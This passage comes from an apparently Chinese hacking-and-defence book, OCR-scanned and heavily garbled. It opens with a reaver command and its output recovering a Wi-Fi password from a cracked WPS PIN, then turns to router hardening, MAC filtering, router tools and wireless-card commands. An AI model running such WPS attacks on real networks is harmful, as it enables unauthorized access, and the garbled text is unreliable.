[step 加 获取 到 pin 码 后 ， 可 以 通过 pin 码 获 
取 密 码 ， 这 时 可 以 使 用 “reaver -i wlan0mon 
-b<AP-MAC 地 址 > -ww -p <PIN 码 >” 命 令 
来 获取 密码 ， 这 里 获取 的 密码 为 Password， 
如 下 图 所 示 。 


[+] Received M1 message 

[+] Sending M2 message 

[+] Received M3 message 

[+] Sending M4 message 

[+] Received M5 message 

[+] Sending M6 message 

[+] Received M7 message 

[+] Sending WSC NACK 

[+] Sending WSC NACK 

[+] Pin cracked in 4 seconds 
[+] WPS PIN: '35169857" 

[+] WPA PSK: 'Password’ 

[+] AP SSID: 'Test-001' 

[+] Nothing done, nothing to save. 


13.3 无 线路 由 器 的 安全 防护 
技巧 


无 线路 由 器 本 身 自 带 安全 设置 选项 ， 
通过 设置 这 些 安全 选项 ， 可 以 提高 无 线路 
由 器 的 安全 性 能 ， 从 而 不 受 黑 客 攻击 。 


由 车 昌 绝 招 9: 强化 管理 员 密 码 


路 由 器 的 初始 密码 比较 简单 ， 为 了 保证 
局 域 网 的 安全 ， 一 般 需 要 修改 或 设置 比较 复 
si 具体 的 操作 步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设置 界面 ， 
“系统 工具 ”选项 下 的 “修改 登录 密码 ” 
选项 ， 打 开 “ 修 改 管理 员 密 码 ” 工 作 界 面 ， 
如 下 图 所 示 。 
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[step 国 在 “ 原 密码 ”文本 框 中 输入 原来 的 密 
码 ， 在 “新 密码 ”和 “确认 新 密码 ”文本 
框 中 输入 新 设置 的 密码 ， 最 后 单 击 “ 保 存 ” 
按钮 即 可 ， 如 下 图 所 示 。 


EE 加 二 


,可 © | an 


TP-LINK 


绝招 10: 无 线 网 络 WEP 加 密 


WEP 采用 对 称 加 密 机 理 ， 数 据 的 加 密 Se 
和 解密 采用 相同 的 密 钥 和 加 密 算法 。 下 面 
详细 介绍 无 线 网 络 WEP 加 密 的 具体 方法 。 


1. 设置 无 线路 由 器 WEP 加 密 数据 


打开 路 由 器 的 Web 后 台 设置 界面 ， 单 
击 左 侧 “无 线 参数 ”一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 , 在 “安全 类 型 ” 
下 拉 列 表 中 选择 WEP 选项 ， 在 “ 密 钥 格 式 
选择 ”下 拉 列 表 中 选择 “ASCII 码 ”选项 。 
设置 密 钥 ， 在 “ 密 钥 1” 后 面 的 “ 密 钥 类 
型 ”下 拉 列 表 中 选择 “64 位 ”选项 , 在 “ 密 
钥 内 容 ” 文 本 框 中 输入 要 使 用 的 密码 ， 本 
实例 输入 密码 为 cisco, 单 击 “ 保 存 ” 按 钮 ， 
如 下 图 所 示 。 


| 室 全 提示 :为 保 隐 网 络 安 全 ， 强 列 推荐 开启 安全 设置 ， 并 使 用 

PA-FSK/WPH2-PSK AES 加 密 方 法 > 

万 开启 安全 设置 

sx: 

| 去 人 过 而 : 

宝 和 格式 选择 : 

HiNI: 个 

进 制 数字 符 32 个 ， 或 者 ASEII 玛 字 

EE 本 EE 
证 旬 1 |[Gseq 原名 可 
EE 栈 可 

| Si: 9 EE 
ET Ens| 

匡 司 匠 本 
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2. 客户 端 连接 

需要 WEP 加 密 认 证 的 无 线 客户 端 连接 
的 具体 操作 步骤 如 下 。 
[Eee 国 单 去 系统 桌面 右 下 角 “ 贺 ”图标 ， 无 
线 客 户 端 自动 扫描 到 区 域内 的 所 有 无 线 信 
号 ， 如 下 图 所 示 。 


当前 连接 到 : 


加 
无 mntemet 访问 


无 线 网 阁 连 接 
tp-link 


tzgs 


打开 网 阁 和 共享 中 心 


右 击 tp-LINK 信号 ， 在 弹出 的 快捷 菜 
单 中 选择 “连接 ”菜单 命令， 如 下 图 所 示 。 


当前 连接 到 : 
a 
无 Internet 访问 
无 线 网 阁 连 现 ~ 
tp-link 这 本 | 
tzgs EJ 
204 ll 
TP-UNK_SW | 
| 
' 
| 打开 网 洛 和 共享 中 心 


弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ” 文 本 框 中 输入 密码 cisco， 单 击 “ 确 
定 ” 按 钮 ， 如 下 图 所 示 。 


键入 网 络 安全 密 钥 


安全 志和 钥 (S): 


本 


step 园 单 击 系统 桌面 右 下 角 “ 贺 ”图标 ， 将 
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光标 放 在 th-link 信号 上 ， 可 以 看 到 无 线 信 
号 的 连接 情况 ， 如 下 图 所 示 ， 表 明 已 经 成 
功 连接 无 线路 由 器 。 

当前 连接 到 : 


tp-link 
无 lnternet 访问 


二 == 未 识别 的 网 络 
TY 无 intemet 访 问 


无 入网 络 连 接 
无 线 电 


SSID: tp-link 


打开 网 络 和 共享 中 心 


绝招 11: WPA-PSK 安 全 加 密 


WPA-PSK 可 以 看 成 是 一 个 认证 机 制 ， 酷 
只 要 求 一 个 单一 的 密码 进入 每 个 无 线 局 域 
网 节点 (例如 无 线路 由 器 )， 只 要 密码 正确 ， 
就 可 以 使 用 无 线 网 络 。 下 面 介绍 如 何 使 用 
WPA-PSK 或 者 WPA2-PSK 加 密 无 线 网 络 。 


1. 设置 无 线路 由 器 WPA-PSK 安 全 加 密 
数据 


打开 路 由 器 的 Web 后 台 设 置 界面 ， 
选择 “无 线 设置 ”一 “无 线 安全 设置 ” 选项 ， 
进入 无 线 网 络 安全 设置 界面 。 选 择 “WPA- 
PSK/WAP2-PSK” 单 选 按钮 ， 在 “认证 类 型 ” 
下 拉 列 表 中 选择 “自动 ”选项 , 在 “加 密 算法 ” 
下 拉 列 表 中 选择 “自动 ”选项 , 在 “PSK 密码 ” 
文本 框 中 输入 加 密 密 码 ， 本 实例 设置 密码 
为 “sushi1986”， 如 下 图 所 示 。 


uve 上 E 短 办 各 盏 ， 忆 现 无 线 自 


二 而 到 由 办 天 99 全 认 i 计 而 
安全: 为 届 问 全， 强 只 并且 全 计生 ,并 信 3 
/We AH 二 万 法。 


step 国 单 去 “保存 ”按钮 ， 弹 出 一 个 提示 对 

话 框 ， 单 击 “ 确 定 ” 按 钮 ， 重 新 启动 路 由 

器 即 可 ， 如 下 图 所 示 。 
192.168.1.1 上 的 网 页 显示 : 


确认 重新 启动 路 由 器 ? 


2. 使 用 WPA-PSK 安 全 加 密 认 证 的 无 线 
客户 端 
[Eeep 国 单 去 系统 桌面 右 下 角 “ 圆 ”图 标 ， 无 
如 下 图 所 示 。 


当前 连接 到 


= 未 识别 的 网 络 
TY 无 Internet 访 问 


无 浅 网 络 连 接 


tp-link 


打开 网 络 和 共享 中 心 


[step 图 右 去 tp-link 信号 ， 在 弹出 的 快捷 菜单 
中 选择 “连接 ”菜单 命令 。 

[step 图 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 “sushi1986”， 
单 击 “ 确 定 ” 按 钮 ， 如 下 图 所 示 。 


键入 网 络 安全 密 钥 


安全 窗 铀 (S): sushi1986 


回 生 妆 字符 (H) 


step 回 单 击 系统 桌面 右 下 角 “ 贺 ”图 标 ， 将 
光标 放 在 tp-link 信号 上 ， 可 以 看 到 无 线 信 
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号 的 连接 情况 ， 如 下 图 所 示 ， 表 明 已 经 成 
功 连接 无 线路 由 器 。 


过于 全 
| A plink 
Internet 访问 


| 嫩 RaoR 结 
TY 无 Intemet 访问 


无 网 半 过 捷 ~ 


tp-link 
tzgs -lin = ff 
204 2 | 


打开 网 阁 和 共享 中 心 


侈 提 示 : 在 WPA-PSK 加 密 算法 的 使 用 过 
程 中 ， 密 码 设置 应 尽 可 能 复杂 ， 并 且 要 注 
意 定 期 更 改 密码 。 


绝招 12: MAC 地 址 过 滤 的 设置 


网 络 管理 的 主要 任务 之 一 就 是 控制 客 辐 
户 端 对 网 络 的 接 入 和 对 客户 端的 上 网 行为 
进行 控制 ， 无 线 网 络 也 不 例外 ， 通 常 无 线 
AP 利用 媒体 访问 控制 (MAC) 地 址 过 滤 的 
方法 来 限制 无 线 客户 端的 接 入 。 

使 用 无 线路 由 器 进行 MAC 地 址 过 滤 的 
具体 操作 步骤 如 下 。 
[Sep 国 打开 路 由 器 的 Web 后 台 设 置 界面 ， 
单 击 左 侧 “无 线 参数 ”一 “MAC 地 址 过 滤 ” 
选项 ， 默 认 情 况 MAC 地 址 过 滤 功 能 是 关闭 
状态 ， 单 击 “ 启 用 过 滤 ” 按 钮 ， 开 启 MAC 
地 址 过 滤 功 能 ， 单 击 “ 添 加 新 条 目 ” 按 钮 ， 
如 下 图 所 示 。 


本 页 设备 nAC 地 址 过 下 未 榨 制 计算 机 对 本 无 绪 同 关 的 访问 。 


mc 地 由 寺 关 功 能 已 关闭 
EETT] 

人 人 主旨 寺中 生 部 规 IH 之 外 Ac 地 址 访 间 本 无 线 引 属 

个 要 上 列表 中 生 交 规则 之 4 地 村 访问 本 无 线 53 络 


| 


| MC 地 让 EE EE [ 理 自 
[要 三 和 ] [RE | [天 和 于 某 司 
[ [ES 医 加 


step 图 打开 “MAC 地 址 过 滤 ” 对 话 框 ， 在 
“MAC 地 址 ”文本 框 中 输入 无 线 客户 端 
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的 MAC 地 址 ， 本 实例 输入 MAC 地 址 为 
00-0C-29-5A-3C-97， 在 “描述 ”文本 框 中 
输入 MAC 描述 信息 sushipc， 在 “类 型 ” 
下 拉 列 表 中 选择 “允许 ”选项 ， 在 “状态 ” 
下 拉 列 表 中 选择 “生效 ”选项 ， 依 照 此 步 
又 将 所 有 合法 的 无 线 客户 端的 MAC 地 址 加 
入 到 此 MAC 地 址 表 后 ， 单 击 “ 保 存 ” 按 钮 ， 
如 下 图 所 示 。 


无 线 网 络 &AE 地 址 过 渤 设 置 


本 页 设置 WAC 地 址 过 滤 来 控制 计算 机 对 本 无 线 网 络 的 访问 


| MM 地 址 : 00-0C-29-5A-3C-97 
据 述 ; sushipe 
| 类 型 : 允许 要 
状态 : EE 
保存 ] [到 可 | [不 于 | 


[sep 图 选择“ 过滤 规则 ”选项 下 的 “允许 ” 
单 选 按钮 ， 表 明 在 下 面 MAC 列表 中 生效 规 
则 之 外 的 MAC 地 址 可 以 访问 无 线 网 络 ， 如 
下 图 所 示 。 


本 页 设 贺 IWA 地 址 过 珠 来 控制 计 其 机 对 于 无线 网 绍 的 访问 " 


IC 地 址 过 涉 攻 能 :已 关闭 [ 且 有 天 ] 
ET 
全 大 许 下 寺中 生 站 规则 之 8 地 址 询问 本 天 如 窜 

个 二 上 列表 中 生 站 姑 则 之 外 的 Mr 地 址 访问 本 天 

ED | 棒 丰 / 共 型 | EE 编辑 
一 | 
[一 [所 条 目 王 让] [所 有 亲自 天 获 “] [本 和 /再 各 引 | 


[step 国 这 样 无 线 客户 端 在 访问 无 线 AP 时 ， 
会 发 现 除了 MAC 地 址 表 中 的 MAC 地 址 
之 外 ， 其 他 的 MAC 地 址 无 法 再 访问 无 线 
AP， 也 就 无 法 访问 互联 网 。 


13.4 无 线路 由 器 的 安全 管理 


使 用 无 线路 由 器 管理 工具 可 以 方便 管 
理 无 线 网 络 中 的 上 网 设备 ， 本 节 介 绍 两 个 
无 线路 由 器 安全 管理 工具 ， 包 括 360 路 由 
器 卫士 与 路 由 优化 大 师 。 


办 绝招 13: 使 用 《360 路 由 器 卫士 》 管 理 


《360 路 由 器 卫士 》 是 一 款 由 360 官方 
推出 的 绿色 免费 的 家 庭 必 备 无 线 网 络 管理 
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工具 。《360 路 由 器 卫士 》 软 件 功能 强大 ， 
支持 几乎 所 有 的 路 由 器 。 在 管理 的 过 程 中 ， 
一 旦 发 现 足 网 设备 想 踢 就 踢 。 下 面 介绍 使 
用 《360 路 由 器 卫士 》 管理 网 络 的 操作 方法 。 
[step 图 下 载 并 安装 《360 路 由 器 卫士 》 软 件 ， 
双击 桌面 上 的 快捷 图 标 ， 打 开 《 路 由 器 卫 
士 》 工 作 界 面 ， 提 示 用 户 正 在 连接 路 由 器 ， 
如 下 图 所 示 。 


[step 图 连接 成 功 后 ， 弹 出 “路 由 器 卫士 提醒 
您 ”对 话 框 , 在 其 中 输入 路 由 器 账号 与 密码 ， 


如 下 图 所 示 。 


ea 
请 输入 您 的 路 由 器 帐号 和 密码 


Bh 


单 击 “ 下 一 步 ” 按 钮 , 进入 “我 的 路 由 ” 
工作 界面 ， 在 其 中 可 以 看 到 当前 的 在 线 设 
备 ， 如 下 图 所 示 。 


[seep 国 如 果 想 要 对 某 个 设备 限 速 ， 则 可 以 单 
击 设备 后 的 “ 限 速 ”按钮 ， 打 开 “ 限 速 ” 


对 话 框 ， 在 其 中 设置 设备 的 上 传 速度 与 下 
载 速度 ， 设 置 完毕 后 ， 单 击 “ 确 认 ” 按 钮 
即 可 保存 设置 ， 如 下 图 所 示 。 


限 速 


[step 图 在 管理 的 过 程 中 ， 一 旦 发 现 有 中 网 设 
备 ， 可 以 单 击 该 设备 后 的 “禁止 上 网 ”按钮 ， 
如 下 图 所 示 。 


step 国 禁止 上 网 后 ， 单 击 “ 黑 名 单 ” 选 项 卡 ， 
进入 “ 黑 名 单 ” 设 置 界面 ， 在 其 中 可 以 看 
到 被 禁止 的 上 网 设备 ， 如 下 图 所 示 。 


[step 国 选择 “路 由 防 黑 ”选项 卡 ， 进 入 “路 
由 防 黑 ” 设 置 界面 ， 在 其 中 可 以 对 路 由 器 
进行 防 黑 检 测 ， 如 下 图 所 示 。 


局 


路 由 器 还 未 做 过 防 黑 检测 全 2 


oo000 
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step 图 单 去 “立即 检测 ”按钮 ， 即 可 开始 对 
路 由 器 进行 检测 ， 并 给 出 检测 结果 ， 如 下 
图 所 示 。 


人 路 由 英 志 抵 和 黑客 入 介 ， 清 放心 上 网 


[是 是 惠 用 | 


[step 图 选择 “路 由 跑 分 ”选项 卡 ， 进 入 “路 
由 跑 分 ”设置 界面 ， 在 其 中 可 以 查看 当前 
路 由 器 信息 ， 如 下 图 所 示 。 


单 击 “开始 跑 分 ”按钮 ， 即 可 开始 评 
估 当 前 路 由 器 的 性 能 ， 如 下 图 所 示 。 


正在 评估 路 由 器 性 能 


| 


[sep 贺 评估 完成 后 ， 会 在 “路 由 跑 分 ”界面 
中 给 出 跑 分 排行 榜 信 息 ， 如 下 图 所 示 。 


ase sa05 5, 43HE 10%692 £, dtTia 6% El ED 
路 由 跑 分 排行 榜 
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[step 图 选择 “路 由 设置 ”选项 卡 ， 进 入 “路 
由 设置 ”设置 界面 , 在 其 中 可 以 对 宽带 上 网 、 
WiFi 密码 、 路 由 器 密码 等 选项 进行 设置 ， 
如 下 图 所 示 。 


路 由 时 光 术 


[step 图 选择 “路 由 时 光 机 ”选项 ， 在 打开 的 
界面 中 单 击 “ 立 即 开启 ”按钮 ， 即 可 打开 
“时 光 机 开启 ”设置 界面 ， 在 其 中 输入 360 
账号 与 密码 ， 然 后 单 击 “ 立 即 登录 并 开启 ” 
按钮 ， 即 可 开启 时 光 机 ， 如 下 图 所 示 。 


登录 您 的 360 手 机 账号 即 可 开启 时 光 机 


忘记 裤 码 。 立即 注册 


EE 加 选择 “宽带 上 网 ”选项 ， 进 入 “宽带 
上 网 ”界面 ， 在 其 中 输入 网 络 运营 商 给 出 
的 上 网 账号 与 密码 ， 单 击 “ 保 存 设置 ” 按 铀 ， 
即 可 保存 设置 ， 如 下 图 所 示 。 
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step 图 选择 “WiFi 密码 ”选项 ， 进 入 “WiFi 
密码 ?界面 , 在 其 中 输入 WiFi 密码 , 单 击 “ 保 
存 设 置 按钮 ， 即 可 保存 设置 ,如 下 图 所 示 。 


Eee 图 选择 “路 由 器 密码 ”选项 ， 进 入 “路 
由 器 密码 ”界面 ， 在 其 中 输入 路 由 器 密码 ， 
单 击 “ 保 存 设置 ”按钮 ， 即 可 保存 设置 ， 
如 下 图 所 示 。 


Step 可 选择 “重启 路 由 器 ”选项 ， 进 入 “ 重 
启 路 由 器 ”界面 ， 单 击 “ 重 启 ” 按 钮 ， 即 可 
对 当前 路 由 器 进行 重启 操作 ， 如 下 图 所 示 。 


~is 
~™ 


重启 路 由 器 


另外 ， 使 用 《360 路 由 器 卫士 》 在 管理 
无 线 网 络 安全 的 过 程 中 ， 一 旦 检测 到 有 设 
备 通过 路 由 器 上 网 ， 就 会 在 计算 机 桌面 的 


右上 角 弹 出 信息 提示 框 ， 如 下 图 所 示 。 


iPhone96 


单 击 “ 管 理 ” 按 钮 ， 即 可 打开 该 设备 
的 详细 信息 界面 ， 在 其 中 可 以 对 网 速 进行 
限制 管理 ， 单 击 “确认 ”按钮 即 可 。 
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名 称 iphonesan 
说 信息。 Pi 站 192168 
MA SE60-16 AA1 
网 邮 管 理 。 me 


《路 由 优化 大 师 》 是 一 款 专业 的 路 由 器 
设置 软件 ， 其 主要 功能 有 一 键 设置 优化 路 
由 、 屏 广告 、 防 蹄 网 、 路 由 器 全 面 检测 及 
高 级 设置 等 ， 从 而 保护 路 由 器 安全 。 

使 用 《路 由 优化 大 师 》 管 理 无 线 网 络 
安全 的 操作 步骤 如 下 。 
Estee 加 下 载 并 安装 《路 由 优化 大 师 》， 双 去 
桌面 上 的 快捷 图 标 ， 即 可 打开 《路 由 优化 
大 师 》 的 工作 界面 ， 如 下 图 所 示 。 


step 园 单 击 “ 登 录 ” 按 钮 , 打开 RMTools 窗口 ， 
在 其 中 输入 管理 员 密 码 ， 如 下 图 所 示 。 
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© preas 


| 


[step 图 单 击 “确定 ”按钮 ， 即 可 进入 路 由 器 
工作 界面 ， 在 其 中 可 以 看 到 主人 网 络 和 访 
客 网 络 信息 ， 如 下 图 所 示 。 


@ RMTools 


CE ED 
TL-WRS8S6N 


[step 园 单 击 “ 设 备 管理 ”图 标 ， 进 入 “设备 
管理 ”工作 界面 ， 在 其 中 可 以 看 到 当前 无 
线 网 络 中 的 连接 设备 ， 如 下 图 所 示 。 


设备 管理 
衣 2155 


| 


= 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 国 如果 想 要 对 某 个 设备 进行 管理 ， 则 可 
以 单 击 “ 管 理 ” 按 钮 ， 进 入 该 设备 的 管理 
界面 ， 在 其 中 可 以 设置 设备 的 上 传 速 度 、 
下 载 速度 以 及 上 网 时 间 等 信息 ， 如 下 图 
所 示 。 


_MRTMRNG ， 
0.103 | MAC: 4 


@ OKB/s 
上 传 广 天 了 


© OKB/s 
TE 


上 网 时 则 设 罩 


[sep 国 单 击 “ 添 加 允许 上 网 时 间 段 ” 超 链 接 ， 
即 可 打开 上 网 时 间 段 的 设置 界面 ， 在 其 中 
可 以 设置 时 间 段 描述 信息 、 开 始 时 间 、 结 
束 时 间 等 ， 如 下 图 所 示 。 


时 间 维 岳 述 | 上 到 时 间 不 上 网 


Fe8I 间 | 08 "| 时 00 "| 
| 


二 8j 间 | 18 |] 时 00 | 分 


“alalcalLiralCara 


单 击 “ 确 定 ” 按 钮 ， 即 可 完成 上 网 时 
间 段 的 设置 操作 ， 如 下 图 所 示 。 


-FRR 


Eeep 国 单 击 “ 应 用 管理 ”图 标 ， 即 可 进入 “应 
用 管理 ”工作 界面 ， 在 其 中 可 以 看 到 《路 由 优 
化 大 师 》 为 用 户 提供 的 应 用 程序 ,如 下 图 所 示 。 
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step 图 如 果 想 要 使 用 菜 个 应 用 程序 ， 则 可 以 
单 击 某 应 用 程序 下 的 “进入 ”按钮 ， 进 入 
该 应 用 程序 的 设置 界面 ， 如 下 图 所 示 。 


疆 芭 备 捷 人 近 市 


[step 国 单 去 “路 由 设置 ”图 标 ， 在 打开 的 界 
面 中 可 以 查看 当前 路 由 器 的 设置 信息 ， 如 
下 图 所 示 。 


[ep 贺 选择 左 侧 的 “上 网 设置 ”选项 ， 在 打 
开 的 界面 中 可 以 对 当前 的 上 网 信息 进行 设 
置 ， 如 下 图 所 示 。 


EE EE 
[step 图 选择 “无 线 设置 ”选项 ， 在 打开 的 界 
面 中 可 以 对 路 由 的 无 线 功能 进行 开关 、 名 
称 、 密 码 等 信息 设置 ， 如 下 图 所 示 。 


| = | 
[st 图 选择 “LAN 口 设置 ”选项 ， 在 打开 
的 界面 中 可 以 对 路 由 的 LAN 口 进 行 设置 ， 
如 下 图 所 示 。 


[step 加 选择 “DHCP 服务 器 ”选项 ， 在 打开 
的 界面 中 可 以 对 路 由 的 DHCP 服务 器 进行 
设置 ， 如 下 图 所 示 。 


step 图 选择 “在 线 升 级 ”选项 ， 在 打开 的 界 
面 中 可 以 对 《路 由 优化 大 师 》 的 版 本 进行 
升级 操作 ， 如 下 图 所 示 。 
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step 图 选择 “修改 管理 员 密 码 ” 选 项 ， 在 打 
开 的 界面 中 可 以 对 管理 员 密 码 进行 修改 设 
置 ， 如 下 图 所 示 。 


[se 加 选择 “备份 和 载 入 配置 ”选项 ， 在 打 
开 的 界面 中 可 以 对 当前 路 由 器 的 配置 进行 
备份 和 载 入 设置 ， 如 下 图 所 示 。 


[SB 图 选择 “重启 和 恢复 出 厂 ” 选项， 在 打 
开 的 界面 中 可 以 对 当前 路 由 器 进行 重启 和 
恢复 出 厂 设 置 ， 如 下 图 所 示 。 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


恢复 出 三 设置 


EEG6 国 选择 “系统 日 志 ” 选 项 ， 在 打开 的 


界面 中 可 以 查看 当前 路 由 器 的 系统 日 志 


信息 ， 如 下 图 所 示 。 


[Eee 国 路 由 器 设置 完毕 后 ， 返 回 到 路 由 优 
化 大 师 的 工作 界面 ， 选 择 “ 防 踏 网 ” 选 
项 ， 在 打开 的 界面 中 可 以 进行 防 踏 网 设 
置 ， 如 下 图 所 示 。 


x 


所 有 设备 ( 引 。 黑 名 单 吕 ) 
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@ maw (rm ) MS 
AFOIG-611211054 p ma | 
Oe EB 
© DESKTOP-D5KFISE ne 它 【= 】 
5 下 -5 3 ed 


[se 图 选择 “ 屏 广告 ”选项 ， 在 打开 的 界面 
中 可 以 设置 过 滤 广 告 是 否 开启 , 如 下 图 所 示 。 
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视频 过 滤 广 告 未 开启 


打开 视频 过 浇 广 告 后 ,使 用 电脑 看 视 锻 ,不 会 出 现 广告 ! 


step 图 单 击 “开启 广告 过 滤 ” 按 钮 ， 即 可 开 
， 启 视频 过 滤 广 告 功能 ， 如 下 图 所 示 。 
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视频 过 滤 广 告 已 开启 


打开 视频 过 直 广告 后 ， 使 用 电脑 看 规 频 , 不 会 出 现 广告 ! 


6 图 单 去 “立即 清理 ”按钮 ， 即 可 清理 广 
告 信息 ， 如 下 图 所 示 。 
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视频 过 滤 广 告 已 开启 
于 开 现 项 这 运 广告 后 ,全 用 电 妥 看 现 痪 ， 不 会 出 现 广 千 


SAERPRORLEWMacal SeeirgeMpplcagon Patava6echrometchremmeWicer patavpetauinFache 


[Eee 图 选 择 “ 测 网 速 ” 选 项 ， 进 入 网 速 测试 
设置 界面 ， 如 下 图 所 示 。 


3 10 
/ Ma/s 
as 20 
”ay 
| - 100 
0.00wam 


Eee 图 单 去 “开启 测速 ”按钮 ， 即 可 对 当前 
网 络 进行 测速 操作 ， 测 出 来 的 结果 显示 在 
工作 界面 中 ， 如 下 图 所 示 。 


IM 4M 10M 20M SoM 100M 200M 000M 


为 56.34MB/ 秒 ， 祖 当 于 50M ~ 100M 的 带 完 


13.5 ”实战 演练 


四 实战 演练 1 一 一 在 Linux 系 统 中 查看 无 线 
网 卡 信息 


无 线 网 卡 购买 后 ， 下 面 就 可 以 查看 网 
卡 的 信息 了 ， 包 括 网 卡 模式 、 网 卡 信息 、 
网 卡 映 射 信息 等 ， 具 体 的 操作 步骤 如 下 。 
step 图 查看 网 卡 模式 。 使 用 iw list 命令 查看 
网 卡 的 信息 ， 执 行 结 果 如 下 图 所 示 ， 这 里 
显示 出 来 的 模式 是 该 网 卡 所 支持 的 所 有 模 
式 ， 如 下 图 所 示 。 


Supported interface modes: 
IBSS 

managed 

AP 

AP/VLAN 
monitor 

mesh point 


在 kali Linux 系统 命令 界面 中 输入 
ifconfig -a 命令， 通过 这 个 命令 可 以 查看 本 
机 所 有 网 卡 信 息 ， 可 以 看 到 此 时 本 台 计 算 
机 中 没有 无 线 网 卡 ， 如 下 图 所 示 。 


root@kall:-# ifconf1g -3 
ethO: flags=4163<UP, BRDADCAST,RUNNING, MULTICAST> mtu 1569 

157.131 “netmask 255.255.255.9 broadcast 192.168.157.255 
:26c:29ff:fe39:f29c prefixlen 64 scopeid ex29<\ink> 
ether 69:0c:29:39:f2:9c txqueuelen 1960 (Ethernet) 
RX packets 5863 bytes 1093293 [1.9 MB) 
RX errors 9 dropped 8 overruns @ frame 日 
TX packets 1245 bytas 100278 (97.9 KiB) 
TX errors 9 dropped 9 overruns 0 carrier 9 collisions © 


六 六 六 入 六 并 


lo: flags=73<UP,LOOPBACK,RUNVING> mtu 65536 
inet 127.0.0.1 netmask 255.9.0.0 
inet6 ::1 prefixlen 128 scopeid gx10chost> 
loop txqueuelen 100 (Local Loopback) 
HX Packets lbg byTes 5544 (5.3 Rig) 
Rx errors 9 dropped 9 overruns @ franeB 
TX packets 168 bytes 8544 (B.3 KiB) 
TX errors 0 dropped 9 overruns @ carrier 9 collisions 日 


[step 图 将 网 卡 映射 进 虚 拟 机 ， 选 择 wmware 
工具 栏 中 的 “虚拟 机 ”菜单 选项 ， 在 弹出 
的 菜单 中 选择 “可 移动 设备 ”菜单 命令 ， 
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从 可 移动 设备 中 选择 相应 的 无 线 网 卡 并 进 
行 连接 ， 如 下 图 所 示 。 


[Ee 
5 可 
coovp oa 
mn Os? MM mses 


sndroid 


step 国 此 时 会 弹出 一 个 提示 对 话 框 ， 询 问 是 
否 连接 USB 设备 ， 单 击 “ 确 定 ” 按 钮 ， 如 
下 图 所 示 。 


kali-linux-2018.3-vm-amd64 - VMware Workstation x 


CE 。 某 个 US8 设备 将 要 从 主机 找 出 并 连接 到 该 虚拟 机 。 该 设备 将 先 
停止 以 实现 安全 移 除 。 对 于 某 些 设备 ， 主 机 可 能 会 显示 消息 现 
在 可 以 安全 地 移 除 设备 。” 


口 不 再 显示 此 消息 (S) 


Cu |] mw 


step 园 运行 “ifconfig -a” 命 令 ， 这 时 会 多 出 
一 个 “wlan0” 开 头 的 信息 段 ， 这 就 是 无 线 
网 卡 的 信息 ， 如 下 图 所 示 。 


root@kali:~# ifconfig -a 
ethe: flags=4163<UP, BROADCAST, RUNNING, MULTICAST> mtu 1500 
inet 192,168,157.131 ‘netmask 255,255,255.0 broadcast 192,168,157.255 
inet6 Te89::26c:29ff:fe39:f29c pretixlen 64 scopeid 9x29<tink> 
erher 98:6c:29:39:f2:9c txqueueten 1000 (Ethernet) 
RX packets 56639 bytes 66929258 【63.8 MiB) 
RX errors © dropped 0 overruns 9 trane © 
Tx packets 22877 bytes 1399881 (1.3 MiB) 
TX errors © dropped 9 overruns 9 carrier @ collisions @ 


lo: flags=73<UP,LOOPBACK, RUNNING> mtu 65536 
inet 127.8.0.1 netmask 255.0.9.0 

pretixlen 128 scopeid ox10<host> 

‘queuelen 1699 (Local Loopback) 

ts 172 bytes 8784 (8.5 KiB) 

Rx errors 9 dropped 0 overruns 0 frane 9 

TX packets 172 bytes 8784 (8.5 KiB) 

TX errors 9 dropped 0 overruns 9 carrier 0 collisions 日 


wlang: flags=4098<BROADCAST, MULTICAST> mtu 1599 
ether 12:34:da:c1:78:64 txqueuelen 1000 (Ethernet) 
RM packets © bytes 8 (0.9 B) 
RX errors © dropped 9 overruns 9 frane 8 
Tx packets 0 bytes © (0.9 6) 
TX errors @ dropped 9 overruns 9 carrler 9 colllsions @ 


step 较 使 用 iwconfig 命令 ， 只 显示 无 线 网 卡 
信息 ， 执 行 结果 如 下 图 所 示 。 


root@kali:-# ivcontig 
ta no wireless extensions. 


wlang IEEE 692.11 ESSID:"TPOuest_6073" 
37 GHz Access Point: 86:83:CD:33:60:73 


-| 20 dB 
Retry short long Umit:2 RTS thr:off Fraonent thr:off 
Encryption key:off 

Power Managenent: off 

Link Quality=70/76 Signal level=-17 dan 

Rx invatid nwid:@ Rx invalid crypt:9 Rx invalid frag:© 
Tx excessive retries:25 Invalid nisc:@ Missed beacon:@ 


ethe no wireless extensions. 


实战 演练 2 一 一 在 Windows 10 系 统 创建 
AP 热点 


Windows 10 系统 自 带 设置 网 络 共 享 
的 功能 ， 可 以 通过 以 下 步骤 设置 一 个 虚拟 
AP， 具 体 的 操作 步骤 如 下 。 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[En 大 去 “开始 ”按钮 ， 在 弹出 的 快捷 茉 
单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


文件 资源 管理 器 {E) 


搜索 (S) 


运行 (R) 


关机 或 注销 (U) 


桌面 (D) 


[se 图 打开 “运行 ”对 话 框 ， 在 “打开 ” 文 
本 框 中 输入 cmd， 如 下 图 所 示 。 


珂 


Windows 将 根据 你 所 输入 的 名 称 ， 为 你 打开 相应 的 程序 、 
文 作 实 


文 机 或 Internet 资源 . 


打开 (O): 


Emd 
图 借用 管理 权限 创建 比 任务 


[step 图 打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 
入 netsh wlan show drivers 命令 ， 检 查 无 线 
网 卡 是 否 支持 AP 功能 ， 如 果 有 “支持 的 承 


京 滑 浏览 (8)… 


载 网 络 : 是 ”信息 ， 证 明 具 有 AP 功能 ， 如 
下 图 所 示 。 

国 管理 员 : C\windows\system32\cmd.exe 过 口 X 
Jicrosoft Windows [版 本 10. 0. 16299.936] ~ 
(c) 2017 用 crosoft Corporation。 保 留 所 有 权利 。 


[C:\Users\Administratornetsh wlan show drivers 
接口 名 称 : WLAN 2 


: 802. 1ln USB 无 线 LAN 卡 
: Ralink Technology, Corp. 


序 : Microsoft 
: 2015/4/21 
: 5.1.22.0 
INF 文件 


: netr28ux, inf 
机 WLAN 


的 无 线 电 类 型 : 3 llb Best ln 


i :是 
